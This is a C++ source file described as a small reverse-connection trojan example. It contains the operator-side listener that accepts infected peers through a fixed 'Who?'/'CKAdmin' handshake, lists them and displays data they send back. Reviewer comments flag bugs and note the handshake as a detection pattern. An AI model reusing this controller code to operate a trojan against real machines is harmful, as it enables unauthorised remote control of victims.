
📄 stdafx.cpp

📁 一个用vc写的反弹式木马的小例子
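// stdafx.cpp : source file that includes just the standard includes
//	MC.pch will be the pre-compiled header
//	stdafx.obj will contain the pre-compiled type information
//
// NOTE: despite the stock header above, this file also defines the listener
// thread (AcceptFunc), the receive thread (RecvThread) and the linked-list
// helpers used by the listening side of the sample.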

#include "stdafx.h"
#include "winsock2.h"
#include  <mmsystem.h>
#pragma comment(lib, "WINMM.LIB")
#include "MFC.h"

// Shared state defined in another translation unit. No lock or other
// synchronisation around these globals is visible in this file.
extern	ListCK	*ListHead;	// head of the singly linked list of accepted peers (see AddToCKList / RemoveCKList)
extern	BOOL	bStart;		// polled by AcceptFunc; when it is not TRUE the listener closes its socket and returns
extern	USHORT	TallID;		// ID stamped on the next accepted peer; incremented in AcceptFunc
extern  ActiveList* HeadActiveList;	// head of the list pairing a peer ID with its dialog window
extern  DWORD	CurLocalIP;	// not referenced by the code visible in this file

// Forward declarations for helpers defined further down and called from AcceptFunc.
void  AddToCKList ( ListCK* lp );
void AddStrToListCtrl(CListCtrl* lpList,CString str);

// Listener thread for the listening (operator) side of the sample.
//
// lpParameter is cast to ListCK* and supplies the bind address (dwIP), the
// port (uPort) and, through the reused Next field, a CListCtrl* that receives
// one row per accepted peer. While bStart is TRUE the thread polls the
// listening socket with a 2-second select(); each accepted peer must send the
// literal "Who?" and is answered with "CKAdmin" before it is recorded in the
// global ListCK list. Returns -1 if socket() or bind() fails and 1 once
// bStart is no longer TRUE.
//
// NOTE(review): the exchange is a fixed cleartext string pair with no
// authentication. Any peer that sends "Who?" is accepted and listed, and the
// "Who?" / "CKAdmin" pair is stable enough to serve as a network detection
// pattern for this sample.
DWORD WINAPI AcceptFunc ( LPVOID lpParameter )
{
	// INIT
	ListCK* lp = (ListCK*) lpParameter;
	DWORD LocalIP = lp->dwIP;
	USHORT LocalPort = lp->uPort;
	// The Next field of the parameter block is reused to carry the list control pointer.
	CListCtrl* lpList = (CListCtrl*)lp->Next;
	/////////////////////

	// NULL is not the Winsock "invalid" value; it is overwritten on the next line anyway.
	SOCKET	sock = NULL;
	sock = socket(AF_INET, SOCK_STREAM , IPPROTO_TCP);
	if ( sock == INVALID_SOCKET )
	{
		AfxMessageBox("socket init error");
		return -1;
	}
	SOCKADDR_IN addr_in = {0};
	addr_in.sin_addr.S_un.S_addr = LocalIP;
	addr_in.sin_family = AF_INET;
	addr_in.sin_port = htons(LocalPort);

	Sleep(100);
	int ret = 0;
	ret = bind (sock, (struct sockaddr*)&addr_in,sizeof(addr_in) );
	if ( ret == SOCKET_ERROR )
	{
		AfxMessageBox("bind error");
		// NOTE(review): sock is not closed on this path, so the handle leaks.
		return -1;
	}
	// Backlog of 1; the return value of listen() is not checked.
	listen(sock,1);
	ULONG L=0;
	// FIONBIO with a zero argument selects blocking mode; ret is not inspected afterwards.
	ret = ioctlsocket(sock,FIONBIO,&L);

	while ( TRUE )
	{
		if ( bStart == TRUE )
		{

			// Wait at most 2 seconds for a pending connection so bStart is re-checked regularly.
			fd_set  fdR;
			struct  timeval timeout;
			timeout.tv_sec = 2;
			timeout.tv_usec = 0;
			FD_ZERO(&fdR);  
			FD_SET(sock, &fdR);
			
			// Winsock ignores the first argument of select(); it is kept for BSD-style compatibility.
			switch (select(sock + 1, &fdR, NULL,NULL, &timeout))
			{  
                case SOCKET_ERROR:  
					// select() failed: only traced, then the loop retries immediately.
					TRACE("00000000000\n");
					break;
                        
                case 0:  
				//	TRACE("11111111111\n");
					// Timeout: nothing to accept in this interval.
					break;
                        
                default:  
                        if ( FD_ISSET(sock,&fdR) )
						{  
						//	TRACE("333333333\n");
							SOCKADDR_IN A = {0};
							int len = sizeof(A);

							SOCKET  s = accept(sock,(struct sockaddr *)&A,&len);
							if ( s != INVALID_SOCKET )
							{
								// The inner ret and len shadow the outer variables of the same name.
								char buf[64] = {0};
								int oldopt = 0;
								int ret;
								int len = sizeof(int);
								// Save the current receive timeout, then limit the handshake read to 3000 ms.
								ret = getsockopt (s,SOL_SOCKET, SO_RCVTIMEO,(char*)&oldopt,&len);
								int newopt = 3000;
								ret = setsockopt (s,SOL_SOCKET, SO_RCVTIMEO,(char*)&newopt,len);

								// NOTE(review): the return value of recv() is ignored; the comparison
								// below relies on buf having been zero-initialised for termination.
								recv(s,buf,64,0);
								if (!strcmp(buf,"Who?"))
								{
									// Fixed 7-byte reply, sent without a terminating NUL.
									send(s,"CKAdmin",7,0);
								
									// inet_ntoa() returns a pointer to a buffer owned by Winsock;
									// p is only valid until the next inet_ntoa() call on this thread.
									char *p = inet_ntoa(A.sin_addr);
									//AfxMessageBox(p);
									//Add to CKList
									// NOTE(review): the calloc() result is dereferenced without a NULL check.
									ListCK *tp =(ListCK *)calloc(1,sizeof(ListCK));
									TRACE("######%08x\n",tp);
									tp->dwIP = A.sin_addr.S_un.S_addr;
									tp->sock = s;
									tp->Next = NULL;
									tp->uID = TallID;
									AddToCKList(tp);
									//add to m_List
									// NOTE(review): this updates an MFC control from the thread running
									// AcceptFunc - confirm that this is the thread that owns the control.
									AddStrToListCtrl(lpList,p);												
									// TallID is a shared global; no synchronisation is visible here.
									TallID++;
									PlaySound(MAKEINTRESOURCE(IDR_WAVE),AfxGetResourceHandle(),SND_RESOURCE|SND_PURGE|SND_NODEFAULT); 
								}
								// Restore the receive timeout saved above.
								// NOTE(review): when the handshake does not match, s is neither stored
								// nor closed in this function, so the socket handle leaks.
								ret = setsockopt (s,SOL_SOCKET, SO_RCVTIMEO,(char*)&oldopt,len);
							}
						}
			}
			// Redundant: fdR is rebuilt at the top of every iteration.
			FD_CLR(sock, &fdR);
		}
		else
		{
			// bStart is no longer TRUE: close the listener and end the thread.
			// Sockets already stored in the ListCK list are not touched here.
			TRACE("333333333\n");
			closesocket(sock);
			return 1;
		}
	}

	// Not reached: the loop above only exits through its return statements.
	return 1;
}


// Release every node of the global ListCK list and leave ListHead NULL.
// Only the node memory is freed; the SOCKET stored in each node is not
// closed by this function.
void RemoveCKList()
{
	for ( ListCK *node = ListHead; node != NULL; node = ListHead )
	{
		// Advance the head first so the node can be freed safely.
		ListHead = node->Next;
		free(node);
	}
}
		
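// Push lp onto the front of the global ListCK list.
//
// lp       node to insert; ownership passes to the list (RemoveCKList frees it).
//          A NULL pointer is ignored.
void  AddToCKList ( ListCK* lp )
{
	if ( lp == NULL )
		return;	// nothing to link, e.g. a failed allocation in the caller

	// Always overwrite Next with the previous head (NULL when the list is
	// empty). AcceptFunc in this file reads a CListCtrl* out of a ListCK's
	// Next field, so a node arriving with a non-list value in Next would
	// otherwise leave an empty list unterminated.
	lp->Next = ListHead;
	ListHead = lp;
}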

// Append one row to the list control: column 0 receives the current value of
// the global TallID formatted as decimal text, column 1 receives str.
void AddStrToListCtrl(CListCtrl* lpList,CString str)
{
	// The new row goes after the last existing item.
	const int row = lpList->GetItemCount();

	CString idText;
	idText.Format("%d",TallID);

	lpList->InsertItem(row,"");
	lpList->SetItemText(row,0,idText);
	lpList->SetItemText(row,1,str);
}


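// Record that the dialog lpDlg is open for the peer whose ID is given as text.
//
// sid      peer ID as a decimal string; atoi() yields 0 for non-numeric text,
//          so malformed input is stored under ID 0.
// lpDlg    dialog window associated with that peer; stored, not owned.
//
// The new node is pushed onto the front of the global HeadActiveList and is
// released by DelFromActiveWindow. If the allocation fails nothing is added.
void	AddToActiveList(CString sid, CWnd* lpDlg)
{
	ActiveList *lp =(ActiveList *)calloc(1,sizeof(ActiveList));
	if ( lp == NULL )
		return;	// out of memory: leave the list unchanged instead of dereferencing NULL

	lp->ID = atoi(sid);
	lp->lpDlg = lpDlg;
	// Linking to the old head covers the empty-list case too (Next becomes NULL).
	lp->Next = HeadActiveList;
	HeadActiveList = lp;
}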

// Look up the dialog registered for the peer ID given as decimal text.
// When a matching entry exists, its window is focused and shown without
// activation and TRUE is returned; otherwise FALSE.
BOOL	FindActiveWindow(CString sid)
{
	const int wanted = atoi(sid);

	for ( ActiveList* cur = HeadActiveList; cur != NULL; cur = cur->Next )
	{
		if ( cur->ID != wanted )
			continue;

		// First match wins.
		cur->lpDlg->SetFocus();
		cur->lpDlg->ShowWindow(SW_SHOWNOACTIVATE);
		return	TRUE;
	}
	return	FALSE;
}

// Remove and free the first HeadActiveList entry whose ID equals the decimal
// value of sid. Returns TRUE when an entry was removed, FALSE when none matched.
// The dialog pointer stored in the entry is not destroyed here.
BOOL	DelFromActiveWindow(CString sid)
{
	const int wanted = atoi(sid);

	// Walk the chain through the link that points at the current node, so the
	// head and interior cases are unlinked by the same assignment.
	ActiveList** link = &HeadActiveList;
	while ( *link != NULL && (*link)->ID != wanted )
		link = &(*link)->Next;

	ActiveList* found = *link;
	if ( found == NULL )
		return FALSE;

	*link = found->Next;
	free(found);
	return	TRUE;
}

// Receive thread for one peer connection.
//
// lpParameter is cast to RecvThreadInfor*; its pointer fields are copied into
// a local struct and used for the lifetime of the thread. Each loop iteration
// reads up to 1024 bytes from *sock, appends them to the text held in the
// global-memory block *pmemHandle (by allocating a larger block and copying),
// updates the byte count *pNum and hands the new block to pOut via SetHandle().
// Returns 0 when recv() reports an error.
//
// NOTE(review): everything the remote peer sends is appended without any size
// limit and handed to the control unfiltered, so the peer controls this
// process's memory growth; every read also re-copies the whole accumulated
// buffer.
DWORD WINAPI RecvThread ( LPVOID lpParameter )
{
	RecvThreadInfor* T =(RecvThreadInfor*) lpParameter;
	// Only the pointers are copied; the objects they refer to stay shared with the creator.
	RecvThreadInfor	L = {0};
	L.pButton = T->pButton;	// copied but not used in the code below
	L.pmemHandle = T->pmemHandle;
	L.pOut = T->pOut;
	L.sock = T->sock;
	L.pNum = T->pNum;

	while ( TRUE )
	{
		char Buf [ 1024 ] = {0};
		int ret = recv( *L.sock , Buf, 1024 , 0 );
		
		// -1 is SOCKET_ERROR. The message text reads: "Cannot communicate with
		// the other side, please close this control dialog."
		// NOTE(review): ret == 0 (peer closed the connection) is not handled, so
		// the loop keeps running and reallocating every 10 ms after a clean close.
		if ( ret == -1 )
		{
			TRACE("\n OnClose() " );
			AfxMessageBox("无法和对方通信请关闭此控制对话框");
			return 0;
		}
		
		DWORD	OldSize = *L.pNum;
		*L.pNum = OldSize + ret;
		
		// New block holds old text + new bytes + one terminating NUL.
		// NOTE(review): the results of GlobalAlloc() and both GlobalLock() calls
		// are used without a NULL check.
		GLOBALHANDLE Th  = GlobalAlloc(GMEM_MOVEABLE | GMEM_ZEROINIT | GMEM_SHARE,*L.pNum+1);
		char*	p = (char*)GlobalLock(*L.pmemHandle);
		char*	tp = (char*)GlobalLock(Th);
		memcpy(tp,p,OldSize);
		memcpy(tp+OldSize,Buf,ret);
		tp[OldSize+ret] = 0;
	
		GlobalUnlock(*L.pmemHandle);
		GlobalUnlock(Th);

		// Swap in the new block: the old one is freed before the control is
		// pointed at the replacement.
		// NOTE(review): pOut looks like an edit control updated from this thread;
		// confirm the owning thread and that nothing reads the old handle in between.
		GlobalFree(*L.pmemHandle);
		*L.pmemHandle = Th;
		L.pOut->SetHandle(*L.pmemHandle);
		Sleep(10);
	
	}
	// Not reached: the loop only exits through the return above.
	return	1;
}

